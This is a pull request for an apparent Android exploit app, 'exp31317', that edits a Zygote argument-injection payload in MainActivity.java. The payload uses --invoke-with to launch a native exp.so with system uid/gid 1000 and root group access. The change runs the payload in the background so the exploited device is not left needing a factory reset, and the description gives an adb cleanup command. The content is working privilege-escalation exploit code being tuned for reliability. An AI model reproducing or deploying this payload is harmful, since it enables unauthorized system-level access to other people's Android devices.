### PR TITLE
Fix factory reset bricking

### DIFF
--- a/31317/app/src/main/java/com/fh/exp31317/MainActivity.java
+++ b/31317/app/src/main/java/com/fh/exp31317/MainActivity.java
@@ -78,7 +78,7 @@ public class MainActivity extends AppCompatActivity {
             Payload += "12\n" +
                     "--runtime-args\n" +
                     "--invoke-with\n" +
-                    packageCodePath.substring(0, packageCodePath.length() - 8)+"lib/arm64/exp.so;\n" + // Change to lib/arm/exp.so for 32 bit devices
+                    packageCodePath.substring(0, packageCodePath.length() - 8)+"lib/arm64/exp.so&\n" + // Change to lib/arm/exp.so for 32 bit devices
                     "--setuid=1000\n" +
                     "--setgid=1000\n" +
                     "--setgroups=0\n" + // Get Root GID (gives you access to a few folders / files in some system dirs)
@@ -101,7 +101,7 @@ public class MainActivity extends AppCompatActivity {
                     "12\n" +
                     "--runtime-args\n" +
                     "--invoke-with\n" +
-                    packageCodePath.substring(0, packageCodePath.length() - 8)+"lib/arm64/exp.so;\n" + // Change to lib/arm/exp.so for 32 bit devices
+                    packageCodePath.substring(0, packageCodePath.length() - 8)+"lib/arm64/exp.so&\n" + // Change to lib/arm/exp.so for 32 bit devices
                     "--setuid=1000\n" +
                     "--setgid=1000\n" +
                     "--setgroups=0\n" + // Get Root GID (gives you access to a few folders / files in some system dirs)


### PR DESCRIPTION
When the process runs in the background, the boot process is still broken but it is possible to use ADB to fix the issue, preventing you from having to factory reset.

**This doesn't update the README**, so it should give instructions to run `adb shell settings delete global hidden_api_blacklist_exemptions` instead of factory resetting.  I can make the change to the README a little later